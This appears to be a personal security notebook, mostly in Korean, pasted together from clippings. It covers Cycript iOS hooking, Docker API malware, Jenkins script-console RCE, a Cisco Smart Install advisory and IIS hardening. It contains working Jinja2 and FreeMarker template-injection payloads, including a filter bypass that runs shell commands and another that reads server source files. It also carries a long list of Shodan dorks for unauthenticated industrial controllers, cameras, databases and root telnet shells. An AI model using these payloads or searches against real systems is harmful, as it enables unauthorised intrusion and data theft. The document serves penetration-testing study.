https://commondatastorage.googleapis.com/chromium-browser-asan/index.html

Chrome Build File

https://iphonedevwiki.net/index.php/Cycript_Tricks

https://bachs.tistory.com/entry/iOS-Hooking3Cycript

https://hackcatml.tistory.com/52

1. Cycript

Cycript는 iOS에서 실행되고 있는 애플리케이션을 동적으로 수정하고 분석을 할 수 있게 해주는 SDK이다.문법은 기본적으로 Objective-C / JavaScript를 혼합하여 사용 가능하다. 

2. Cycript Hooking

2-1) view계층 확인하기

ex) UIApp.keyWindow.recursiveDescription()

view의 계층을 출력하여준다. NSLog로 출력하여 큰 화면으로 보면 아래와 같이 이쁘게 보인다.

2-2) subviews()

ex) UIApp.keyWindow.subviews()[index]

window는 하나 이상의 view를 가지며, view 역시 하나 이상의 view의 집합이다. 각 하위 view들의 접근은 subviews()[index]의 형태로 접근 가능하고, 2-1에서 확인한 계층을 참조하여 각 요소들을 찾을 수 있다.

2-3) _viewDelegate()

ex) UIApp.keyWindow.subviews()[2].subviews()[0]._viewDelegate()

_viewDelegate를 이용하여 해당 view의 controller에 접근 가능하다.

2-4) replacing existing objective-C methods

ex) Game2ViewController.prototype['recognizeAnswer'] 

= function() { NSLog(@"[JSACH]HOOKED"); return 1;}

참고) Cycript에서 사용하는 API나 문법, Trick들이 정리되어있는 링크

 - iOS Tricks

     http://iphonedevwiki.net/index.php/Cycript_Tricks

 - Cycript공식 홈페이지

http://www.cycript.org/

참고로 이 글은 Cycript 0.9.594버전을 기준으로 작성을 하였다.

3. 결과

3-1) 메서드 재정의

3-2) 메서드 후킹 로그

3-3) 후킹 성공 결과

------------------

cyrun을 이용하면 ios 12에서도 cycript 사용이 가능.

- Cycript 및 Cyrun 설치 및 구동

wget http://apt.saurik.com/debs/cycript_0.9.594_iphoneos-arm.deb

wget http://www.tateu.net/repo/files/net.tateu.cycriptlistenertweak_1.0.0_iphoneos-arm.deb

wget http://www.tateu.net/repo/files/net.tateu.cyrun_1.0.5_iphoneos-arm.deb

dpkg -i cycript_0.9.594_iphoneos-arm.deb

dpkg -i net.tateu.cycriptlistenertweak_1.0.0_iphoneos-arm.deb net.tateu.cyrun_1.0.5_iphoneos-arm.deb

cyrun -n <AppName on home icon> -e -d 또는

cyrun -b <AppBundleID> -e -d

- Bundle ID, Bundle DisplayName, Bundle ExecutableName 확인

NSBundle.mainBundle.infoDictionary.allKeys()

NSBundle.mainBundle.infoDictionary.CFBundleName

NSBundle.mainBundle.infoDictionary.CFBundleIdentifier

NSBundle.mainBundle.infoDictionary.CFBundleDisplayName

- View 계층 확인

UIApp.keyWindow.rootViewController    // root view controller 확인

UIApp.keyWindow.rootViewController._printHierachy().toString()

UIApp.keyWindow.recursiveDescription().toString()

UIApp.keyWindow._autolayoutTrace.toString()    // simplified recursiveDescription

- subviews 확인

UIApp.keyWindow.subviews()    // keyWindow의 subviews 확인. 아래 예시는 #으로 구분되는 2개의 subviews를 가지고 있음

#주소.subviews()    // 특정 주소값을 가지는 view의 subviews 확인. 아래 예시는 #으로 구분되는 1개의 subview를 가지고 있음

UIApp.keyWindow.subvies()[index]._viewDelegate()    // 해당 뷰를 담당하는 controller 출력. 아래 예시는 keyWindow의 첫번째 subview를 담당하는 controller가 UIApplicationRotationFollowingController 임을 나타냄.

- 상태표시줄 숨기기 / 표시하기(안되는 경우가 많음)

[[UIApplication SharedApplication] setStatusBarHidden:YES]

[[UIApplication SharedApplication] setStatusBarHidden:NO]

- 아이콘 badge number 조작(안되는 경우가 많음)

var a = [UIApplication sharedApplication]

[a setApplicationIconBadgeNumber:100];

- Print Methods

(1) printMethods 함수 만들어서 수행

// Usage:
// for InstanceMethods: printMethods('className')
// for ClassMethods: printMethods('className', true)
function printMethods(className, isa) {
  var count = new new Type("I");
  var classObj = (isa != undefined) ? objc_getClass(className)->isa :
  objc_getClass(className);
  var methods = class_copyMethodList(classObj, count);
  var methodsArray = [];
  for(var i = 0; i < *count; i++) {
  var method = methods[i];
  methodsArray.push({selector:method_getName(method),
  implementation:method_getImplementation(method)});
  }
  free(methods);
  return methodsArray;
}

==> 실행결과(DVIA-v2 앱에 대해서 test)

출력된 결과는 보기 힘드니, Online Javascript Beautifier를 활용(ex.  https://beautifier.io/).

(2) _methodDescription() 메서드 활용

UIApp.keyWindow.rootViewController._printHierachy() 명령어로 뷰 계층 확인 후 관심 클래스의 주소값에 대하여 다음 명령어 수행

#<주소값>._methodDescription().toString()    // 이 방법의 경우 알고자 하는 클래스의 method 뿐만 아니라 다른 클래스의 메서드들도 출력해주다보니 쓸모없는 정보들이 너무 많이 출력됨

- Print Current ViewController

function currentVC() {
  var app = [UIApplication sharedApplication]
  var keyWindow = app.keyWindow
  var rootController = keyWindow.rootViewController
  var visibleController = rootController.visibleViewController
  if (!visibleController){
  return rootController
  }
  return visibleController.childViewControllers[0]
}

==> 실행결과

※ 출처

https://bachs.tistory.com/entry/iOS-Hooking3Cycript

https://sevencho.github.io/archives/c12f47b1.html

https://gist.github.com/laprasdrum/667213ab364ef2536a30f3bdb79c77bb

http://nullgirl.com/blog/2018/03/20/iOS%E9%80%86%E5%90%91%E4%B8%8E%E5%AE%89%E5%85%A8-Cycript%E8%84%9A%E6%9C%AC%E4%BD%BF%E7%94%A8/

https://ileeyj.tistory.com/257

해커, 도커도 뚫었다 – ㈜소프트이천 (soft2000.com)

최근 클라우드 도입이 증가하면서 많은 시스템들이 가상화 기술을 사용하고 있다. 일반적으로 잘 알려진 가상화 기술 ‘하이퍼바이저(Hypervisor)’는 애플리케이션과 라이브러리를 격리시킬 수 있다. 하지만, 운영체제(OS) 뿐만 아니라 하드웨어 스택 부분도 가상화 시키기 때문에 메모리, CPU 등 자원을 많이 소모한다. 반면 ‘도커(Docker)’는 애플리케이션과 라이브러리를 패키지(컨테이너)로 묶어 리눅스 컨테이너(LinuX Containers: LXC)’로 리소스가 적게 드는 격리 환경을 만들 수 있다.

또한 도커는 애플리케이션을 쉽게 빌드(Build), 테스트(Test), 및 배포(Deploy) 할 수 있어 ‘데브옵스(Devops)’에 최적화되어 있는 오픈 소스 도구라 할 수 있다. 이에, 많은 기업들이 도커를 활용해 데브옵스 환경을 구축하고 있다.

도커를 타겟으로 한 악성코드

최근, 많은 서버들이 도커로 구성되면서 이를 타겟으로 한 공격도 증가하고 있다. 특히, 여러 공격 중에서도 ‘Docker REST API’를 이용한 공격이 급증하고 있다. 실제로 도커 관련 서버들의 침해 사례들을 보면 공격자들이 ‘Docker REST API’를 이용해 악성코드를 배포하고 있다. 그리고, 배포된 악성코드에는 취약한 Docker REST API 설정의 서버를 대상으로 측면 이동(Lateral Movement) 기능이 포함되어 기존 SSH 봇넷 악성코드처럼 공격이 확산되고 있다.

본 문서에서 언급하는 ‘취약한 Docker REST API 설정을 가진 서버’는 인증 및 접근 제한없이 원격 환경에서 ‘도커 이미지(Docker Image)’와 ‘도커 컨테이너(Docker Container)’를 관리하는 REST API를 사용할 수 있는 서버를 말한다.

취약한 Docker REST API 서버는 HTTP Request(Port:2375/2376)에 대한 HTTP Response({"message":"page not found"})를 통해 Docker REST API 서버를 탐지할 수 있다. 따라서, 격자는 [그림 2]와 같이 무작위 스캐닝을 수행해 취약한 Docker REST API 서버를 탐지한다.

공격자는 취약한 Docker REST API 서버를 알아낸 다음 Docker REST API를 통해 기존 도커 컨테이너에 악성코드를 실행시키거나 새로운 악성 도커 이미지를 다운로드 받아 실행시킨다.

특히, 공격자는 직접 포트 스캔을 하지 않고도 ‘쇼단(SHODAN)’과 같은 오신트(OSINT: 오픈소스 인텔리전스의 줄임말)를 이용해 Docker REST API 설정이 취약한 서버를 쉽게 찾을 수 있다. 이러한 방식으로 배포되는 악성코드는 대표적으로 6가지 종류가 있으며, 그 히스토리는 아래와 같다.

이번 글에서는 위 악성코드 6개 중 ‘Kinsing’, ‘Xanthe’, ‘KaijiDDoS’에 대해 소개한다.

Remote Code Execution | A Story of Simple RCE on Jenkins Instance. | by Awez Kagdi | Medium

Abusing Jenkins Groovy Script Console to get Shell | by Nishant Sharma | Pentester Academy Blog

Here I have used censys.io tool to identify the vulnerability. In below POC you can seen in search query I have searched Jenkins dashboard. In result you will receive an IP’s and technologies platform used.

Now you have to open the IP in the browser tab to check the Jenkins Dashboard access. As you can see we have the dashboard access without any authentication and authorization.

Now you have to check if you have any other privilege's to exploit this vulnerability. How to check???

1. IP/asynchPeople
2. IP/configure
3. IP/configureSecurity
4. IP/script

Description: found a Jenkins instance publicly accessible. An attacker can execute an arbitrary code .

I opened it and it was publicly accessible and the worst part was it didn’t have any authentication set over it. Jenkins likes to view all the people having access to Jenkins Instance /asynchPeople provides that,

/configureSecurity- for global configuration setting.

/configure- configuration mode

/Script- To execute the script/commands.

As you can see we have access to script console to execute commands.

You can execute the followings commands and many more if you want.

1. “ls /”.execute().text
2. string contentRead = new File(‘/etc/passwd’).getText(‘UTF-8’)

You can also open terminal, This allows you to execute commands directly and depending on the user privilege.

Cisco Smart Install Client 취약점 (tistory.com)

2017년초 Cisco Smart Install Client 취약점을 통하여 공격이 들어와서 시스템이 재부팅 되는 증상이 발견되었다. 내용은 아래와 같다
 
l  원인 : Cisco Smart Install Client(CVE-2018-017) 취약점을 이용한 원격 시스템 재부팅(참조URL1)
l  대상 펌웨어 : 아래 URL에서 확인 가능(참조URL2)
l  증상 : 시스템 리부팅, DOS공격, 무한루프 발생
l  공격형태
-       침입자는 Cisco Smart Install Client 장치에서 사용되는 Smart Install 메시를 TCP4786 포트를 통하여 보내어
시스템에 악영향을 끼칠수 있는 오버플로우 생성, 원격 명령어(Reload), 무한루프등을 발생
l  조치 방법
1.     펌웨어 업그레이드
2.  Vstak Disable(임시조치)
1) 스위치에서 Smart Install Client 기능 관련 서비스 활성화 여부 확인
test# show vstack config
 Role: Client (SmartInstall enabled)   // enable일경우 사용중임
Vstack Director IP address: 0.0.0.0
 
*** Following configurations will be effective only on director ***
Vstack default management vlan: 1
Vstack start-up management vlan: 1
Vstack management Vlans: none
Join Window Details:
         Window: Open (default)
         Operation Mode: auto (default)
Vstack Backup Details:
         Mode: On (default)
         Repository:
 
2) 스위치에서 관련포트 활성화 여부 확인
** 외부에서 접근시에만 나오는 경우도 있음
test# show tcp brief all
04A20C38  1.1.1.1.4786     *.*   LISTEN
 
3) 외부에서 관련포트 접근 확인
 
C:\Users\kang>telnet 1.1.1.1 4786
 
4) 스위치에서 Smart Install Client 기능 비활성화
test# conf t
Enter configuration commands, one per line.  End with CNTL/Z.
test(config)# no vstack
test(config)# do sh vstack config
Role: Client (SmartInstall disabled)   // disable일 경우
Vstack Director IP address: 0.0.0.0
 
*** Following configurations will be effective only on director ***
Vstack default management vlan: 1
Vstack start-up management vlan: 1
Vstack management Vlans: none
Join Window Details:
         Window: Open (default)
         Operation Mode: auto (default)
Vstack Backup Details:
         Mode: On (default)
         Repository:
 
5) 스위치 관련 포트 활성화 여부 확인(외부에서 접근 테스트 진행)

 
참조URL1 : https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=27106
참조URL2 : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2

{{config.__class__.__base__.__subclasses__()}}

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2

https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }

https://medium.com/@nyomanpradipta120/jinja2-ssti-filter-bypasses-a8d3eb7b000f

Jinja2 SSTI filter bypasses

Photo by Matt Hoffman on Unsplash

as you (should) know — blacklists are bad and can often be circumvented. To check the class in SSTI jinja2 we can use payload {{().__class__}} but how about using underscore if blacklisted?.

Source code for testing:

• Bypassing underscore

The first filter looks config and underscores blocked. How do we do template injection without using underscores? we can use the request.args a function that is used to retrieve value injection in different parameters but to do concatenation cannot because the value will change to a string. But there is one interesting function of the flask that is attr we can do concatenation and take values ​​outside the parameters affected by the filter.

Voila, we can bypass the underscore.

• Bypassing underscore,[],request, and |join

Seen in the last filter we can not do anything but as long as attr has not been filtered we can do RCE by replacing underscore with hex \x5f we can escape checking but when rendering \x5f will change to underscore.

Voila bypass was successful after that just search <class ‘subprocess.Popen’> in subclasses, to find out subclasses in the environment we can use {{()|attr(‘\x5f\x5fclass\x5f\x5f’)|attr(‘\x5f\x5fbase\x5f\x5f’)|attr(‘\x5f\x5fsubclasses\x5f\x5f’)()}} to find out the index of subprocess I usually copy all subclasses into txt and do a for loop in python to guess which subprocess are in the index.

with open('lol.txt') as p:
    check = p.read()for index,value in enumerate(check.split(',')):
    if "<class 'subprocess.Popen'>" in value:
        print(index)

When it starts, subprocess is found in index 287, but the problem is we can’t use []. We can replace the array [] by using the __ getitem __ method.

Final RCE

{{()|attr(‘\x5f\x5fclass\x5f\x5f’)|attr(‘\x5f\x5fbase\x5f\x5f’)|attr(‘\x5f\x5fsubclasses\x5f\x5f’)()|attr(‘\x5f\x5fgetitem\x5f\x5f’)(287)(‘ls’,shell=True,stdout=-1)|attr(‘communicate’)()|attr(‘\x5f\x5fgetitem\x5f\x5f’)(0)|attr(‘decode’)(‘utf-8’)}}

Reference:

Jinja2 template injection filter bypasses

The blogpost is a follow-up to my last post about the “Jins2 Template Injection RCE” in the iCTF 2017 “flasking…

0day.work

 

Template Designer Documentation — Jinja Documentation (2.10.x)

This document describes the syntax and semantics of the template engine and will be most useful as reference to those…

jinja.palletsprojects.com

swisskyrepo/PayloadsAllTheThings

Template injection allows an attacker to include template code into an existant (or not) template. A template engine…

github.com

 

Mastering Python’s __getitem__ and slicing

In Python’s data model, when you write foo[i] , foo.__getitem__(i) is called. You can implement __getitem__ method in…

medium.com

[ IIS ] http header 에 server 정보 숨기기 (tistory.com)

URL Rewrite : The Official Microsoft IIS Site

예제 환경

 

1. OS : windows 10, 2016

2. IIS 버전 : 10

 

이슈 사항

- IIS 를 운영하면서 http header 의 Server 항목에 IIS 로 운영중이라는 점과 

  버전 정보가 노출 됩니다.

 

 

 

 

 

준비 사항 

- IIS 관리자 에서 URL 재작성 항목이 있어야 합니다.

  만약 없을 경우 아래 첨부 파일을 실행 하여 설치 해야 합니다.

 

 

 

rewrite_amd64_ko-KR.msi

5.86MB

 

 

본작업

 

1. 적용하려는 사이트나 왼쪽 최상단 사이트 에서 URL 재작성 버튼 클릭

 

 

 

 

 

2. URL 재작성 에서 작업 > 규칙 추가 클릭

 

 

 

 

3. 아웃바운드 규칙 > 빈규칙 클릭

 

 

 

 

4. 아래와 같이 정보 입력 후 적용 버튼 클릭

 

- 이름 : server 정보 삭제에 대한 표기가능한 이름

- 일치 > 검색범위 : 서버 변수로 select

         > 변수이름 : RESPONSE_SERVER

         > 패턴 : .*     (전체에 적용된다는 의미)

- 작업 > 작업속성 > 값 : IIS 와 버전이 표시 되지 않게끔 적당한 값 설정

 

 

 

 

 

 

 

5. cmd 창을 관리자 권한으로 연 다음 iisreset 명령어로 iis 재기동을 해줍니다.

   (적용 버튼 만으로도 되지만 만약을 위해 iis 재기동을 해주는게 좋음)

 

 

 

 

6. 브라우저에서 사이트 접속 후 header 정보 확인 하면 server 정보가 위에서 입력한

   값으로 변경 된 것을 확인 할 수 있습니다.

 

 

 

좋아요3

https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/1-part-100-article/google/Shodan Queries.txt

GitHub - lothos612/shodan: Shodan Dorks

Shodan Dorks

Basic Shodan Filters

city:

Find devices in a particular city. city:"Bangalore"

country:

Find devices in a particular country. country:"IN"

geo:

Find devices by giving geographical coordinates. geo:"56.913055,118.250862"

Location

country:us country:ru country:de city:chicago

hostname:

Find devices matching the hostname. server: "gws" hostname:"google" hostname:example.com -hostname:subdomain.example.com hostname:example.com,example.org

net:

Find devices based on an IP address or /x CIDR. net:210.214.0.0/16

Organization

org:microsoft org:"United States Department"

Autonomous System Number (ASN)

asn:ASxxxx

os:

Find devices based on operating system. os:"windows 7"

port:

Find devices based on open ports. proftpd port:21

before/after:

Find devices before or after between a given time. apache after:22/02/2009 before:14/3/2010

SSL/TLS Certificates

Self signed certificates ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com

Expired certificates ssl.cert.expired:true

ssl.cert.subject.cn:example.com

Device Type

device:firewall device:router device:wap device:webcam device:media device:"broadband router" device:pbx device:printer device:switch device:storage device:specialized device:phone device:"voip" device:"voip phone" device:"voip adaptor" device:"load balancer" device:"print server" device:terminal device:remote device:telecom device:power device:proxy device:pda device:bridge

Operating System

os:"windows 7" os:"windows server 2012" os:"linux 3.x"

Product

product:apache product:nginx product:android product:chromecast

Customer Premises Equipment (CPE)

cpe:apple cpe:microsoft cpe:nginx cpe:cisco

Server

server: nginx server: apache server: microsoft server: cisco-ios

ssh fingerprints

dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0

Web

Pulse Secure

http.html:/dana-na

PEM Certificates

http.title:"Index of /" http.html:".pem"

Databases

MySQL

"product:MySQL"

MongoDB

"product:MongoDB" mongodb port:27017

Fully open MongoDBs

"MongoDB Server Information { "metrics":" "Set-Cookie: mongo-express=" "200 OK"

Kibana dashboards without authentication

kibana content-legth:217

elastic

port:9200 json port:"9200" all:elastic

Memcached

"product:Memcached"

CouchDB

"product:CouchDB" port:"5984"+Server: "CouchDB/2.1.0"

PostgreSQL

"port:5432 PostgreSQL"

Riak

"port:8087 Riak"

Redis

"product:Redis"

Cassandra

"product:Cassandra"

Industrial Control Systems

Samsung Electronic Billboards

"Server: Prismview Player"

Gas Station Pump Controllers

"in-tank inventory" port:10001

Fuel Pumps connected to internet:

No auth required to access CLI terminal.
"privileged command" GET

Automatic License Plate Readers

P372 "ANPR enabled"

Traffic Light Controllers / Red Light Cameras

mikrotik streetlight

Voting Machines in the United States

"voter system serial" country:US

Open ATM:

May allow for ATM Access availability NCR Port:"161"

Telcos Running Cisco Lawful Intercept Wiretaps

"Cisco IOS" "ADVIPSERVICESK9_LI-M"

Prison Pay Phones

"[2J[H Encartele Confidential"

Tesla PowerPack Charging Status

http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2

Electric Vehicle Chargers

"Server: gSOAP/2.8" "Content-Length: 583"

Maritime Satellites

Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!

"Cobham SATCOM" OR ("Sailor" "VSAT")

Submarine Mission Control Dashboards

title:"Slocum Fleet Mission Control"

CAREL PlantVisor Refrigeration Units

"Server: CarelDataServer" "200 Document follows"

Nordex Wind Turbine Farms

http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"

C4 Max Commercial Vehicle GPS Trackers

"[1m[35mWelcome on console"

DICOM Medical X-Ray Machines

Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.

"DICOM Server Response" port:104

GaugeTech Electricity Meters

"Server: EIG Embedded Web Server" "200 Document follows"

Siemens Industrial Automation

"Siemens, SIMATIC" port:161

Siemens HVAC Controllers

"Server: Microsoft-WinCE" "Content-Length: 12581"

Door / Lock Access Controllers

"HID VertX" port:4070

Railroad Management

"log off" "select the appropriate"

Tesla Powerpack charging Status:

Helps to find the charging status of tesla powerpack. http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2

XZERES Wind Turbine

title:"xzeres wind"

PIPS Automated License Plate Reader

"html:"PIPS Technology ALPR Processors""

Modbus

"port:502"

Niagara Fox

"port:1911,4911 product:Niagara"

GE-SRTP

"port:18245,18246 product:"general electric""

MELSEC-Q

"port:5006,5007 product:mitsubishi"

CODESYS

"port:2455 operating system"

S7

"port:102"

BACnet

"port:47808"

HART-IP

"port:5094 hart-ip"

Omron FINS

"port:9600 response code"

IEC 60870-5-104

"port:2404 asdu address"

DNP3

"port:20000 source address"

EtherNet/IP

"port:44818"

PCWorx

"port:1962 PLC"

Crimson v3.0

"port:789 product:"Red Lion Controls"

ProConOS

"port:20547 PLC"

Remote Desktop

Unprotected VNC

"authentication disabled" port:5900,5901 "authentication disabled" "RFB 003.008"

Windows RDP

99.99% are secured by a secondary Windows login screen.

"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"

Network Infrastructure

CobaltStrike Servers

product:"cobalt strike team server" ssl.cert.serial:146473198 - default certificate serial number ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1

Hacked routers:

Routers which got compromised
hacked-router-help-sos

Redis open instances

product:"Redis key-value store"

Citrix:

Find Citrix Gateway.
title:"citrix gateway"

Weave Scope Dashboards

Command-line access inside Kubernetes pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.

title:"Weave Scope" http.favicon.hash:567176827

MongoDB

Older versions were insecure by default. Very scary.

"MongoDB Server Information" port:27017 -authentication

Mongo Express Web GUI

Like the infamous phpMyAdmin but for MongoDB.

"Set-Cookie: mongo-express=" "200 OK"

Jenkins CI

"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"

Jenkins:

Jenkins Unrestricted Dashboard x-jenkins 200

Docker APIs

"Docker Containers:" port:2375

Docker Private Registries

"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab

Pi-hole Open DNS Servers

"dnsmasq-pi-hole" "Recursion: enabled"

Already Logged-In as root via Telnet

"root@" port:23 -login -password -name -Session

Telnet Access:

NO password required for telnet access.
port:23 console gateway

Polycom video-conference system no-auth shell

"polycom command shell"

NPort serial-to-eth / MoCA devices without password

nport -keyin port:23

Android Root Bridges

A tangential result of Google's sloppy fractured update approach. 🙄 More information here.

"Android Debug Bridge" "Device" port:5555

Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords

Lantronix password port:30718 -secured

Citrix Virtual Apps

"Citrix Applications:" port:1604

Cisco Smart Install

Vulnerable (kind of "by design," but especially when exposed).

"smart install client active"

PBX IP Phone Gateways

PBX "gateway console" -password port:23

Polycom Video Conferencing

http.title:"- Polycom" "Server: lighttpd" "Polycom Command Shell" -failed port:23

Telnet Configuration:

"Polycom Command Shell" -failed port:23

Example: Polycom Video Conferencing

Bomgar Help Desk Portal

"Server: Bomgar" "200 OK"

Intel Active Management CVE-2017-5689

"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995 ”Active Management Technology”

HP iLO 4 CVE-2017-12542

HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900

Lantronix ethernet adapter’s admin interface without password

"Press Enter for Setup Mode port:9999"

Wifi Passwords:

Helps to find the cleartext wifi passwords in Shodan. html:"def_wirelesspassword"

Misconfigured Wordpress Sites:

The wp-config.php if accessed can give out the database credentials. http.html:"* The wp-config.php creation script uses this file"

Outlook Web Access:

Exchange 2007

"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"

Exchange 2010

"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392

Exchange 2013 / 2016

"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"

Lync / Skype for Business

"X-MS-Server-Fqdn"

Network Attached Storage (NAS)

SMB (Samba) File Shares

Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.

"Authentication: disabled" port:445

Specifically domain controllers:

"Authentication: disabled" NETLOGON SYSVOL -unix port:445

Concerning default network shares of QuickBooks files:

"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445

FTP Servers with Anonymous Login

"220" "230 Login successful." port:21

Iomega / LenovoEMC NAS Drives

"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"

Buffalo TeraStation NAS Drives

Redirecting sencha port:9000

Logitech Media Servers

"Server: Logitech Media Server" "200 OK"

Example: Logitech Media Servers

Plex Media Servers

"X-Plex-Protocol" "200 OK" port:32400

Tautulli / PlexPy Dashboards

"CherryPy/5.1.0" "/home"

Home router attached USB

"IPC$ all storage devices"

Webcams

Generic camera search

title:camera

Webcams with screenshots

webcam has_screenshot:true

D-Link webcams

"d-Link Internet Camera, 200 OK"

Hipcam

"Hipcam RealServer/V1.0"

Yawcams

"Server: yawcam" "Mime-Type: text/html"

webcamXP/webcam7

("webcam 7" OR "webcamXP") http.component:"mootools" -401

Android IP Webcam Server

"Server: IP Webcam Server" "200 OK"

Security DVRs

html:"DVR_H264 ActiveX"

Surveillance Cams:

With username:admin and password: :P
NETSurveillance uc-httpd Server: uc-httpd 1.0.0

Printers & Copiers:

HP Printers

"Serial Number:" "Built:" "Server: HP HTTP"

Xerox Copiers/Printers

ssl:"Xerox Generic Root"

Epson Printers

"SERVER: EPSON_Linux UPnP" "200 OK"

"Server: EPSON-HTTP" "200 OK"

Canon Printers

"Server: KS_HTTP" "200 OK"

"Server: CANON HTTP Server"

Home Devices

Yamaha Stereos

"Server: AV_Receiver" "HTTP/1.1 406"

Apple AirPlay Receivers

Apple TVs, HomePods, etc.

"\x08_airplay" port:5353

Chromecasts / Smart TVs

"Chromecast:" port:8008

Crestron Smart Home Controllers

"Model: PYNG-HUB"

Random Stuff

Calibre libraries

"Server: calibre" http.status:200 http.title:calibre

OctoPrint 3D Printer Controllers

title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944

Etherium Miners

"ETH - Total speed"

Apache Directory Listings

Substitute .pem with any extension or a filename like phpinfo.php.

http.title:"Index of /" http.html:".pem"

Misconfigured WordPress

Exposed wp-config.php files containing database credentials.

http.html:"* The wp-config.php creation script uses this file"

Too Many Minecraft Servers

"Minecraft Server" "protocol 340" port:25565

Literally Everything in North Korea

net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24

https://say2.tistory.com/entry/flask-injection%EC%B7%A8%EC%95%BD%EC%A0%90-%EA%B3%B5%EA%B2%A9

python command injection 이 가능할때

<소스 파일를 가져올 수 있는 injection 코드>

{% for c in [].__class__.__base__.__subclasses__()%}{%if c.__name__=='XXXX'%}{{loop.index0}}{%endif%}{%endfor%}

-> 타겟 클래스의 index를 가져온다

결과값 : 101

{{[].__class__.__base__.subclasses__()[59].__init__.func_globals['linecache'].__dict__['os'].path.realpath(__file__)}}

타깃 파일 경로

결과값 : /data1/www/htdocs/222/aaa.py

{{[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dic__['__builtins__'].open("/data1/www/htdocs/222/aaa.py","r").read()}}

결과값 : 추출된 python소스코드

위 세번을 한꺼번에 하려면 아래와 같이 하면됨

 {%for c in [].__class__.__base__.__subclasses__()%}{%if c.__name__=='catch_warnings'%}{{c.__init__.func_globals['linecache'].__dict__['__builtins__'].open('aaa.py').read()}}{%endif%}{%endfor%}

(잘 알겠지만 파이써너 2.7 기준 3에서는 func_globals -> __globals__로 바뀌는 등 몇가지 바뀐다. 사실 python2기준으로 공격하면 됨)